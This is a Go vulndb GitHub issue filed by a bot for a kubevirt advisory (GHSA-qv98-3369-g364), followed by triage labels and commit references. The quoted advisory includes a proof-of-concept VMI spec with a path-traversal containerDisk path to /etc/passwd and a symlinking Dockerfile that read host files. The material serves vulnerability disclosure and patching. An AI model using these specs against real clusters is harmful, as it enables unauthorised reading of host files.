Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

x/vulndb: potential Go vuln in kubevirt.io/kubevirt: GHSA-qv98-3369-g364 #1000

Closed
GoVulnBot opened this issue Sep 15, 2022 · 3 comments
Closed
Assignees
Labels
excluded: EFFECTIVELY_PRIVATE This vulnerability exists in a package can be imported, but isn't meant to be outside that module.

Comments

@GoVulnBot
Copy link

In GitHub Security Advisory GHSA-qv98-3369-g364, there is a vulnerability in the following Go packages or modules:

Unit Fixed Vulnerable Ranges
kubevirt.io/kubevirt 0.55.1 >= 0.20, < 0.55.1

See doc/triage.md for instructions on how to triage this report.

modules:
  - module: TODO
    versions:
      - introduced: 0.20.0
        fixed: 0.55.1
    packages:
      - package: kubevirt.io/kubevirt
description: "### Impact\n\nUsers with the permission to create VMIs can construct
    VMI specs which allow them to read arbitrary files on the host. There are three
    main attack vectors:\n\n1. Some path fields on the VMI spec were not properly
    validated and allowed passing in relative paths which would have been mounted
    into the virt-launcher pod. The fields are: `spec.domain.firmware.kernelBoot.container.kernelPath`,
    `spec.domain.firmware.kernelBoot.container.initrdPath` as well as `spec.volumes[*].containerDisk.path`.\n\nExample:\n\n```yaml\napiVersion:
    [kubevirt.io/v1](http://kubevirt.io/v1)\nkind: VirtualMachineInstance\nmetadata:\n
    \ name: vmi-fedora\nspec:\n  domain:\n    devices:\n      disks:\n      - disk:\n
    \         bus: virtio\n        name: containerdisk\n      - disk:\n          bus:
    virtio\n        name: cloudinitdisk\n      - disk:\n          bus: virtio\n        name:
    containerdisk1\n      rng: {}\n    resources:\n      requests:\n        memory:
    1024M\n  terminationGracePeriodSeconds: 0\n  volumes:\n  - containerDisk:\n      image:
    [quay.io/kubevirt/cirros-container-disk-demo:v0.52.0](http://quay.io/kubevirt/cirros-container-disk-demo:v0.52.0)\n
    \   name: containerdisk\n  - containerDisk:\n      image: [quay.io/kubevirt/cirros-container-disk-demo:v0.52.0](http://quay.io/kubevirt/cirros-container-disk-demo:v0.52.0)\n
    \     path: test3/../../../../../../../../etc/passwd\n    name: containerdisk1\n
    \ - cloudInitNoCloud:\n      userData: |\n        #!/bin/sh\n        echo 'just
    something to make cirros happy'\n    name: cloudinitdisk\n```\n\n2. Instead of
    passing in relative links on the API, using malicious links in the containerDisk
    itself can have the same effect:\n\n```Dockerfile\nFROM <anybase>\nRUN mkdir -p
    /etc/ && touch /etc/passwd\nRUN mkdir -p /disks/ && ln -s /etc/passwd /disks/disk.img\n```\n\n3.
    KubeVirt allows PVC hotplugging. The hotplugged PVC is under user-control and
    it is possible to place absolute links there. Since containerDisk and hotplug
    code use the same mechanism to provide the disk to the virt-launcher pod, it can
    be used too to do arbitrary host file reads.\n\nIn all three cases it is then
    possible to at lest read any host file:\n\n```\n$ sudo cat /dev/vdc\nroot:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\n[...]\n```\n\n\n###
    Patches\n\nKubeVirt 0.55.1 provides patches to fix the vulnerability.\n\n\n###
    Workarounds\n\n* Ensure that the `HotplugVolumes` feature-gate is disabled\n*
    ContainerDisk support can't be disabled. The only known way to mitigate this issue
    is create with e.g. policy controller a conditiontemplate which ensures that no
    containerDisk gets added and that `spec.domain.firmware.kernelBoot` is not used
    on VirtualMachineInstances.|\n* Ensure that SELinux is enabled. It blocks most
    attempts to read host files but does not provide a 100% guarantee (like vm-to-vm
    read may still work).\n\n### References\n\n\nDisclosure notice form the discovering
    party: https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm\n\n###
    For more information\n\nFor interested vendors which have to provide a fix for
    their supported versions, the following PRs are providing the fix:\n\n * https://github.com/kubevirt/kubevirt/pull/8198\n
    * https://github.com/kubevirt/kubevirt/pull/8268\n \n### Credits\nOliver Brooks
    and James Klopchic of NCC Group\nDiane Dubois and Roman Mohr of Google\n"
ghsas:
  - GHSA-qv98-3369-g364

@neild neild added excluded: EFFECTIVELY_PRIVATE This vulnerability exists in a package can be imported, but isn't meant to be outside that module. and removed NeedsTriage labels Sep 20, 2022
@gopherbot
Copy link
Contributor

Change https://go.dev/cl/432217 mentions this issue: data/excluded: add GO-2022-1000.yaml for GHSA-qv98-3369-g364

@gopherbot
Copy link
Contributor

Change https://go.dev/cl/592774 mentions this issue: data/reports: unexclude 50 reports

@gopherbot
Copy link
Contributor

Change https://go.dev/cl/607230 mentions this issue: data/reports: unexclude 20 reports (28)

gopherbot pushed a commit that referenced this issue Aug 21, 2024
  - data/reports/GO-2022-0985.yaml
  - data/reports/GO-2022-0986.yaml
  - data/reports/GO-2022-0987.yaml
  - data/reports/GO-2022-0989.yaml
  - data/reports/GO-2022-0995.yaml
  - data/reports/GO-2022-1000.yaml
  - data/reports/GO-2022-1006.yaml
  - data/reports/GO-2022-1014.yaml
  - data/reports/GO-2022-1015.yaml
  - data/reports/GO-2022-1019.yaml
  - data/reports/GO-2022-1021.yaml
  - data/reports/GO-2022-1023.yaml
  - data/reports/GO-2022-1029.yaml
  - data/reports/GO-2022-1032.yaml
  - data/reports/GO-2022-1033.yaml
  - data/reports/GO-2022-1060.yaml
  - data/reports/GO-2022-1062.yaml
  - data/reports/GO-2022-1065.yaml
  - data/reports/GO-2022-1066.yaml
  - data/reports/GO-2022-1067.yaml

Updates #985
Updates #986
Updates #987
Updates #989
Updates #995
Updates #1000
Updates #1006
Updates #1014
Updates #1015
Updates #1019
Updates #1021
Updates #1023
Updates #1029
Updates #1032
Updates #1033
Updates #1060
Updates #1062
Updates #1065
Updates #1066
Updates #1067

Change-Id: I27b6f79e1898a13040a758a71348464c5e7c72a9
Reviewed-on: https://go-review.googlesource.com/c/vulndb/+/607230
Auto-Submit: Tatiana Bradley <[email protected]>
LUCI-TryBot-Result: Go LUCI <[email protected]>
Reviewed-by: Damien Neil <[email protected]>
Commit-Queue: Tatiana Bradley <[email protected]>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
excluded: EFFECTIVELY_PRIVATE This vulnerability exists in a package can be imported, but isn't meant to be outside that module.
Projects
None yet
Development

No branches or pull requests

4 participants